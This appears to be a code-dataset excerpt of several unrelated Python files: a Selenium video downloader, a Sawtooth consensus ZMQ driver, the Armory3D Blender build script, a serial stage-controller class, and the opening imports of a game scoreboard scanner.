source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
download_video_from_list.py
|
import os
from seleniumwire import webdriver
from selenium.webdriver.chrome.options import Options
from seleniumwire.request import Response
from webdriver_manager.chrome import ChromeDriverManager
import wget
from videoprops import get_video_properties
import multiprocessing as mp
"""
The audio and video files are seperated. To combine them, you need to install and use FFMPEG.
For Windows users, you need to install media pack so that ffmpeg can run properly.
Find your build version of windows, and download related media pack here:
https://support.microsoft.com/en-us/topic/media-feature-pack-list-for-windows-n-editions-c1c6fffa-d052-8338-7a79-a4bb980a700a
"""
DOWNLOAD_FOLDER = "D:\\Colorful_Update\\"
NUM_PROC = 4
LIST_FILE = "vlist.txt"
def download_video(title, html_url):
mp4_file = DOWNLOAD_FOLDER + title + '.mp4'
mp4_tmp = DOWNLOAD_FOLDER + title + '_.mp4'
mp3_file = DOWNLOAD_FOLDER + title + '.mp3'
if os.path.exists(mp4_file):
return "Exists"
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--user_agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15"')
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=chrome_options)
driver.get(html_url)
driver.implicitly_wait(9)
elems = driver.find_elements_by_xpath('//div[@class="commentList"]')
print(title)
video_links = {}
max_video_size = -1
max_video_link = None
max_audio_size = -1
max_audio_link = None
for request in driver.requests:
if request.response:
if request.response.headers['Content-Type'] == 'video/mp4':
new_url, _ = request.url.split('&net=')
media_size = int(request.response.headers['Content-Range'].split('/')[-1])
if 'media-video-avc1' in new_url:
media_type = 'video'
if media_size > max_video_size:
max_video_link = new_url
max_video_size = media_size
else:
media_type = 'audio'
if media_size > max_audio_size:
max_audio_link = new_url
max_audio_size = media_size
if new_url not in video_links:
video_links[new_url] = (media_type, media_size)
print(video_links)
for k, info in video_links.items():
print("-" * 20)
print(k)
print(info)
print("=" * 20)
driver.close()
del driver
try:
mp3_file = mp3_file.replace('?', '')
mp4_tmp = mp4_tmp.replace('?', '')
mp4_file = mp4_file.replace('?', '')
wget.download(max_audio_link, out=mp3_file)
wget.download(max_video_link, out=mp4_tmp)
except Exception as e:
print(e)
print("Download Error", max_audio_link, max_video_link)
if os.path.exists(mp4_tmp) and os.path.exists(mp3_file):
os.system(f'ffmpeg -i "{mp4_tmp}" -i "{mp3_file}" -c copy "{mp4_file}"')
os.remove(mp4_tmp)
os.remove(mp3_file)
return "Done"
def main():
title_dict = {}
with open(LIST_FILE, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
if len(line.strip()) == 0:
continue
title, url = line.split('\t')
url = 'https://www.ixigua.com' + url.strip()
title = title.strip()
title_dict[url] = title
print(title_dict)
proceses = []
count = 0
items = list(title_dict.items())
while True:
if len(proceses) < NUM_PROC:
url, title = items[count]
p = mp.Process(target=download_video, args=(title, url))
proceses.append(p)
p.start()
count += 1
for idx, p in enumerate(proceses):
if not p.is_alive():
proceses.pop(idx)
p.join()
break
if count == len(items):
break
for p in proceses:
p.join()
if __name__ == '__main__':
main()
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.engine import PeerMessage
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 300
SERVICE_TIMEOUT = 300
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
self._stream = Stream(endpoint)
startup_state = self._register()
# Validators version 1.1 send startup info with the registration
# response; newer versions will send an activation message with the
# startup info
if startup_state is None:
startup_state = self._wait_until_active()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT),
startup_state)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception")
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
result = self._process(message)
self._updates.put(result)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
).SerializeToString()
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request)
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK:
if (
response.HasField('chain_head')
and response.HasField('local_peer_info')
):
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info)
return None
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _wait_until_active(self):
future = self._stream.receive()
while True:
try:
message = future.result(1)
except concurrent.futures.TimeoutError:
continue
if (
message.message_type
== Message.CONSENSUS_NOTIFY_ENGINE_ACTIVATED
):
notification = \
consensus_pb2.ConsensusNotifyEngineActivated()
notification.ParseFromString(message.content)
startup_state = StartupState(
notification.chain_head,
notification.peers,
notification.local_peer_info)
LOGGER.info(
'Received activation message with startup state: %s',
startup_state)
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck()
.SerializeToString())
return startup_state
LOGGER.warning('Received message type %s while waiting for \
activation message', message.message_type)
future = self._stream.receive()
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
header = consensus_pb2.ConsensusPeerMessageHeader()
header.ParseFromString(notification.message.header)
peer_message = PeerMessage(
header=header,
header_bytes=notification.message.header,
header_signature=notification.message.header_signature,
content=notification.message.content)
data = peer_message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_ENGINE_DEACTIVATED:
self.stop()
data = None
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
exporter.execute(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.append('--shaderversion')
cmd.append('330')
cmd.append('--parallelAssetConversion')
cmd.append('4')
cmd.append('--to')
cmd.append(arm.utils.build_dir() + '/debug')
cmd.append('--nohaxe')
cmd.append('--noproject')
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
cmd.append('--sound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Serialize krom.js into krom.bin
if wrd.arm_minify_js:
cwd = os.getcwd()
fp = files_path
if state.target == 'krom-macos':
fp += '/' + krom_exe + '/Contents/MacOS'
krom_exe = './Krom'
os.chdir(fp)
args = [krom_exe, '.', '.', '--writebin']
proc = subprocess.Popen(args)
proc.wait()
os.chdir(cwd)
os.remove(fp + '/krom.js')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
DDbackend.py
|
from serial import Serial
from threading import Thread, Lock
class DaisyDriver(Serial):
def __init__(self, connected = True):
# check for connection bool to allow for dummy DaisyDriver object
# if not connected
if connected:
# initialise DaisyDriver serial object (hard code serial address for now)
super(DaisyDriver, self).__init__('/dev/ttyACM0')
# set initial speed (0,1,2 for low,medium,high respectively)
self.speedset(2)
# initialise jog lock
self.joglock = Lock()
# initialise direction dictionary, f = forward, fl = forward left etc...
self.directions = {'l':(0, -1, 0),
'r':(0, 1, 0),
'f':(-1, 0, 0),
'fl':(-1, -1, 0),
'fr':(-1, 1, 0),
'b':(1, 0, 0),
'bl':(1, -1, 0),
'br':(1, 1, 0),
'u':(0, 0, -1),
'd':(0, 0, 1)}
elif not connected:
# just set default speedval for slider to read
self.speedval = 2
# state value of light, assumes on then switches off
self.lightval = 1
self.light_off()
def speedset(self, val):
# speed val
self.speedval = val
# value from slider equals 0, 1 or 2. Use list for converting
# slider index to step motor speed
speeds = [50, 275, 500]
# serial command
command = 'STV 0 {V} {V} {V} \r'.format(V=speeds[self.speedval])
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# flush buffer
self.flush()
def __jogdo(self, x, y, z):
# enable lock
with self.joglock:
# flush buffer
self.flush()
# serial command
command = 'JOG 0 {x_} {y_} {z_} \r'.format(x_=x, y_=y, z_=z)
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# read finish statement
self.readline()
def __jog(self, x, y, z, button_handle):
# count, button status dependent
count = 0
# upper limit on jog repeats
while count < 1000:
if (count == 0):
self.__jogdo(x, y, z)
elif button_handle.isDown():
self.__jogdo(x, y, z)
count+=1
def jog(self, direction, button_handle):
# if not locked then jog
if not self.joglock.locked():
# get direction vector
dir_tuple = self.directions[direction]
# start jog
jogthread = Thread(target=self.__jog, args=(*dir_tuple, button_handle))
jogthread.start()
def light_on(self):
# switch light on, if not on already
if self.lightval==0:
# serial command
bytes_command = b'LON \r'
# write command
self.write(bytes_command)
# set light state as on
self.lightval = 1
# flush buffer
self.flush()
def light_off(self):
# switch light off, if not off already
if self.lightval==1:
# serial command
bytes_command = b'LOF \r'
# write command
self.write(bytes_command)
# set light state as off
self.lightval = 0
# flush buffer
self.flush()
|
R6S Scoreboard Scanner.py
|
#Module importieren
import cv2
import PIL
import pytesseract
import webbrowser
import os
import pyautogui
import numpy as np
import time
from PIL import ImageGrab, Image, ImageTk
import tkinter as tk
